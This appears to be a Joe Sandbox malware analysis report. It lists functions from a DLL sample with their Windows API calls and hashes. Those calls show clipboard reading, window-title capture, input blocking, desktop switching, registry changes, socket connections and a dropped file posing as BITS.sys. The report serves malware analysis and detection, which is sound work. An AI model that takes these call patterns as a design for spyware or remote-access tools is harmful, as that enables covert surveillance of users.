                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 10015221
                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000,?,00000000,000F003F,?), ref: 10015257
                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,000F003F,?), ref: 100152AB
                                                          • malloc.MSVCRT ref: 100152EC
                                                          • malloc.MSVCRT ref: 100152F7
                                                          • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 10015381
                                                          • free.MSVCRT ref: 10015418
                                                          • free.MSVCRT ref: 1001541F
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10015428
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocLocalfreemalloc$EnumInfoOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 1291067549-0
                                                          • Opcode ID: ea280062cf562dc1a7707fb89a94bf9855f2e4583b42d62e8aa87dba222f11ed
                                                          • Instruction ID: 402e0f5699eea022021b6c0871ab9ab74c7c4ee3b45ae780e4ac20626967f966
                                                          • Opcode Fuzzy Hash: ea280062cf562dc1a7707fb89a94bf9855f2e4583b42d62e8aa87dba222f11ed
                                                          • Instruction Fuzzy Hash: 6071D2716083059FD718CF28C880B6BBBE9FBC8745F484A1DF9859B350D671EA44CB52
                                                          Function 100183C0 Relevance: 13.7, APIs: 9, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateRectRgnIndirect.GDI32(?), ref: 10018486
                                                          • GetRegionData.GDI32(00000000,00000000,00000000), ref: 1001851A
                                                          • #823.MFC42(00000000,?,?,?,?,?,?,00000001,?,?,?), ref: 1001851F
                                                          • GetRegionData.GDI32(00000000,00000000,00000000), ref: 10018530
                                                          • DeleteObject.GDI32(?), ref: 10018537
                                                          • #825.MFC42(00000000,00000000,00000000,?,?,00000001,?,?,?,?,?,?,?,?,?,10016B8A), ref: 10018547
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DataRegion$#823#825CreateDeleteIndirectObjectRect
                                                          • String ID:
                                                          • API String ID: 643377033-0
                                                          • Opcode ID: 001346d870f36c53a5a7599e2016c51c9870b5627219f4efa7edda646e5686e0
                                                          • Instruction ID: 3140f93dabf97cb7bd3e409eff6f417ecd497d9d1c0577791c74c40de05a7771
                                                          • Opcode Fuzzy Hash: 001346d870f36c53a5a7599e2016c51c9870b5627219f4efa7edda646e5686e0
                                                          • Instruction Fuzzy Hash: F85181B56087028BD314DF29D880A5BB7E6FFC8710F15492DF48ACB311EB74EA458B56
                                                          Function 10029E80 Relevance: 13.6, APIs: 9, Instructions: 85stringmemorywindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowTextA.USER32(?,?,000003FF), ref: 10029EA4
                                                          • IsWindowVisible.USER32 ref: 10029EB3
                                                          • lstrlenA.KERNEL32(?), ref: 10029ECC
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 10029EDF
                                                          • LocalSize.KERNEL32 ref: 10029EEF
                                                          • lstrlenA.KERNEL32(?), ref: 10029F0D
                                                          • LocalReAlloc.KERNEL32(?,?,00000042), ref: 10029F19
                                                          • GetWindowThreadProcessId.USER32(?), ref: 10029F26
                                                          • lstrlenA.KERNEL32(?,?,?,?,00000042), ref: 10029F34
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalWindowlstrlen$Alloc$ProcessSizeTextThreadVisible
                                                          • String ID:
                                                          • API String ID: 925664022-0
                                                          • Opcode ID: bdfcf0507623c4ea93ccd5645be1c1770e5c62d3ec9ad61f7fed79ab38ba254a
                                                          • Instruction ID: add1fb3533e99334b1788f801bc1a9e543b8ff74f7df4c1f04976087df14b6d6
                                                          • Opcode Fuzzy Hash: bdfcf0507623c4ea93ccd5645be1c1770e5c62d3ec9ad61f7fed79ab38ba254a
                                                          • Instruction Fuzzy Hash: 2621027A2003469BE750DF24CC84BEB77A8FB84750F84452DFE49A3240DA35A80AC771
                                                          Function 10016530 Relevance: 13.6, APIs: 9, Instructions: 77synchronizationkeyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 1001656D
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10016578
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 10016589
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 10016594
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165A3
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165AC
                                                          • ReleaseDC.USER32(00000000,?), ref: 100165B7
                                                            • Part of subcall function 100167E0: sprintf.MSVCRT ref: 1001682F
                                                            • Part of subcall function 100167E0: RegOpenKeyExA.ADVAPI32(?,?,00000000,00000002,?), ref: 1001686F
                                                            • Part of subcall function 100167E0: RegSetValueExA.ADVAPI32(?,SuppressDisableCompositionUI,00000000,00000004,?,00000004), ref: 1001688E
                                                            • Part of subcall function 100167E0: RegCloseKey.ADVAPI32(?), ref: 1001689D
                                                          • BlockInput.USER32(00000000,?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165CD
                                                          • DestroyCursor.USER32(00000000), ref: 1001660A
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$ExchangeHandleInterlockedObjectSingleWait$BlockCursorDestroyInputOpenReleaseValuesprintf
                                                          • String ID:
                                                          • API String ID: 1142494416-0
                                                          • Opcode ID: 4ceefefdeb35724f5cd5cb8af09bc795719a28882878dd3cc17cf0b47423efc6
                                                          • Instruction ID: d4b191a7be4f08d6e559449bda8c86e8365c3d0bd4d75666bcc753f4c4a699e3
                                                          • Opcode Fuzzy Hash: 4ceefefdeb35724f5cd5cb8af09bc795719a28882878dd3cc17cf0b47423efc6
                                                          • Instruction Fuzzy Hash: 00212C752407049BE614DB64CC81BD6B3E8FF88720F154A1DF26A972D0CBB5B901CB91
                                                          Function 1002C5D0 Relevance: 13.6, APIs: 9, Instructions: 66threadstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                          • GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                          • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                          • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                          • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                          • lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                          • SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                          • CloseDesktop.USER32(00000000), ref: 1002C680
                                                          • CloseDesktop.USER32(00000000), ref: 1002C683
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                          • String ID:
                                                          • API String ID: 3718465862-0
                                                          • Opcode ID: 346a97fe3b554d6ea7b4bbaf12baa1f8d932fbe5d70e927d73db7af9313f27ee
                                                          • Instruction ID: 7203b97fb3658a15e50f8a55408f95546fea7e3c6eec87968affc7e345bb74f4
                                                          • Opcode Fuzzy Hash: 346a97fe3b554d6ea7b4bbaf12baa1f8d932fbe5d70e927d73db7af9313f27ee
                                                          • Instruction Fuzzy Hash: B811EB751043196BF310DF68DC4AFDB77D8FB84700F010D19F64592191EBB4A549C7A6
                                                          Function 10010EF0 Relevance: 13.6, APIs: 9, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F11
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F1F
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F2C
                                                          • #541.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F39
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F46
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F53
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F60
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F6D
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F90
                                                            • Part of subcall function 100110D0: #2614.MFC42(00000000,?), ref: 100110F5
                                                            • Part of subcall function 100110D0: #2614.MFC42(00000000,?), ref: 100110FD
                                                            • Part of subcall function 100110D0: #6143.MFC42(00000000,000000FF,00000000,?), ref: 10011110
                                                            • Part of subcall function 100110D0: #2614.MFC42(00000000,000000FF,00000000,?), ref: 1001111C
                                                            • Part of subcall function 100110D0: #860.MFC42(?,00000000,000000FF,00000000,000000FF,00000000,?), ref: 10011137
                                                            • Part of subcall function 100110D0: PathGetArgsA.SHLWAPI(00000000,?), ref: 10011172
                                                            • Part of subcall function 100110D0: #860.MFC42(00000000), ref: 1001117C
                                                            • Part of subcall function 100110D0: PathRemoveArgsA.SHLWAPI(00000000), ref: 10011186
                                                            • Part of subcall function 100110D0: PathUnquoteSpacesA.SHLWAPI(00000000,?), ref: 10011191
                                                            • Part of subcall function 100110D0: _splitpath.MSVCRT ref: 100111C5
                                                            • Part of subcall function 100110D0: #860.MFC42(?,?,?,?,?), ref: 100111D6
                                                            • Part of subcall function 100110D0: #860.MFC42(?,?,?,?,?,?), ref: 100111E8
                                                            • Part of subcall function 100110D0: #6876.MFC42(0000002F,0000005C,?,?,?,?,?,?), ref: 100111F3
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #540$#860$#2614Path$Args$#541#6143#6876RemoveSpacesUnquote_splitpath
                                                          • String ID:
                                                          • API String ID: 882339912-0
                                                          • Opcode ID: bcae64db62a9173b5de6d8cd2ae765ea97d72524f73a260d54af00dd520cab45
                                                          • Instruction ID: b1f006ec1c09e58242ba318f60969b2c11d84897468487acfae0c13bde89da3f
                                                          • Opcode Fuzzy Hash: bcae64db62a9173b5de6d8cd2ae765ea97d72524f73a260d54af00dd520cab45
                                                          • Instruction Fuzzy Hash: DB213B780057818ED354CF59D642B6AFBE4FF94B10F40491DE4DA83682DB74B508CBB2
                                                          Function 10017C20 Relevance: 13.6, APIs: 9, Instructions: 57clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 10017C2A
                                                          • GetClipboardData.USER32(00000001), ref: 10017C36
                                                          • CloseClipboard.USER32 ref: 10017C46
                                                          • GlobalSize.KERNEL32(00000000), ref: 10017C55
                                                          • GlobalLock.KERNEL32(00000000), ref: 10017C5F
                                                          • #823.MFC42(00000001), ref: 10017C68
                                                          • GlobalUnlock.KERNEL32(?), ref: 10017C8F
                                                          • CloseClipboard.USER32 ref: 10017C95
                                                          • #825.MFC42(00000000), ref: 10017CA7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$#823#825DataLockOpenSizeUnlock
                                                          • String ID:
                                                          • API String ID: 15072309-0
                                                          • Opcode ID: e4c83fdc53078b23110fe99408f6848a6625d633b3bafd07e91433b67cd46e05
                                                          • Instruction ID: 9d338dc67493be82bb18043d65382f3dd730fbe0f51d25364675624cb99999ab
                                                          • Opcode Fuzzy Hash: e4c83fdc53078b23110fe99408f6848a6625d633b3bafd07e91433b67cd46e05
                                                          • Instruction Fuzzy Hash: E001D6395046246FE710EB649C89ADB37A8FF44651F490228FD0ED7250EB75E904C6F2
                                                          Function 10016F10 Relevance: 13.6, APIs: 9, Instructions: 57clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 10016F1A
                                                          • GetClipboardData.USER32(00000001), ref: 10016F26
                                                          • CloseClipboard.USER32 ref: 10016F36
                                                          • GlobalSize.KERNEL32(00000000), ref: 10016F45
                                                          • GlobalLock.KERNEL32(00000000), ref: 10016F4F
                                                          • #823.MFC42(00000001), ref: 10016F58
                                                          • GlobalUnlock.KERNEL32(?), ref: 10016F7F
                                                          • CloseClipboard.USER32 ref: 10016F85
                                                          • #825.MFC42(00000000), ref: 10016F97
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$#823#825DataLockOpenSizeUnlock
                                                          • String ID:
                                                          • API String ID: 15072309-0
                                                          • Opcode ID: 4072f59da86136a8181d21f34bb8e7e131716998d916dfe5853bc9eb5e6c99c2
                                                          • Instruction ID: 7427716a2ac4119ad4da49d555f0140185f668cd49e7d982ef33821d485bf08e
                                                          • Opcode Fuzzy Hash: 4072f59da86136a8181d21f34bb8e7e131716998d916dfe5853bc9eb5e6c99c2
                                                          • Instruction Fuzzy Hash: 2401DB395042246FE710EB64AC89AEB3798FF44701F484229FD0ED7200EB759904C6F1
                                                          Function 10022E40 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 146networksynchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(1012C4E8), ref: 10022E6A
                                                          • LeaveCriticalSection.KERNEL32(1012C4E8), ref: 10022E82
                                                            • Part of subcall function 10022D10: _strnicmp.MSVCRT ref: 10022D24
                                                          • send.WS2_32(?,HTTP/1.0 200 OK,?,00000000), ref: 10022F1E
                                                          • send.WS2_32(?,?,00000000,00000000), ref: 10022F94
                                                          • CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 10022FBC
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00000000), ref: 10022FC9
                                                            • Part of subcall function 10022C80: atoi.MSVCRT(?), ref: 10022CB9
                                                            • Part of subcall function 100234D0: htons.WS2_32 ref: 100234F3
                                                            • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023509
                                                            • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023527
                                                            • Part of subcall function 100234D0: socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                            • Part of subcall function 100234D0: setsockopt.WS2_32 ref: 1002355E
                                                            • Part of subcall function 100234D0: connect.WS2_32(?,?,00000010), ref: 1002356E
                                                            • Part of subcall function 100234D0: closesocket.WS2_32 ref: 1002357C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectioninet_addrsend$CreateEnterLeaveObjectSingleThreadWait_strnicmpatoiclosesocketconnecthtonssetsockoptsocket
                                                          • String ID: HTTP/1.0 200 OK
                                                          • API String ID: 599367761-2989790534
                                                          • Opcode ID: dc5ab88c9d324263e74f874c0683124f639aa9fb6a98b0bc22b0b51417796fb7
                                                          • Instruction ID: 1c18553726d68fc3589e71ec96ae4793bdedeea414836eb10bbab6347bb9b08a
                                                          • Opcode Fuzzy Hash: dc5ab88c9d324263e74f874c0683124f639aa9fb6a98b0bc22b0b51417796fb7
                                                          • Instruction Fuzzy Hash: 3541E235604205ABD760DBA4ED84FAB77E8EB84350F514B28F94893184DA34ED45CBA2
                                                          Function 1002C070 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1002C0AA
                                                          • lstrlenA.KERNEL32 ref: 1002C0C9
                                                          • WriteFile.KERNEL32(00000000,?,00000000), ref: 1002C0D2
                                                          • CloseHandle.KERNEL32(00000000), ref: 1002C0D9
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFileLibraryLoadProc$CloseCreateHandleWritelstrlen
                                                          • String ID: BITS$C:\ProgramData\Microsoft Drive\BITS.sys$TGByte\Setup
                                                          • API String ID: 46210954-946259135
                                                          • Opcode ID: 4aa8ea225159965a049aa2fe34a5fb1e8fa0c1b1fe3f4e01dfbb9777c5d44c70
                                                          • Instruction ID: 8c67bea88b0b57ba7171819d29684a3193598bd87e769d5b6608642be2e21653
                                                          • Opcode Fuzzy Hash: 4aa8ea225159965a049aa2fe34a5fb1e8fa0c1b1fe3f4e01dfbb9777c5d44c70
                                                          • Instruction Fuzzy Hash: FA116375104310BFE310DF18DC94BEBBBE9FB89710F444929FA48A72A1DB745909CBA2
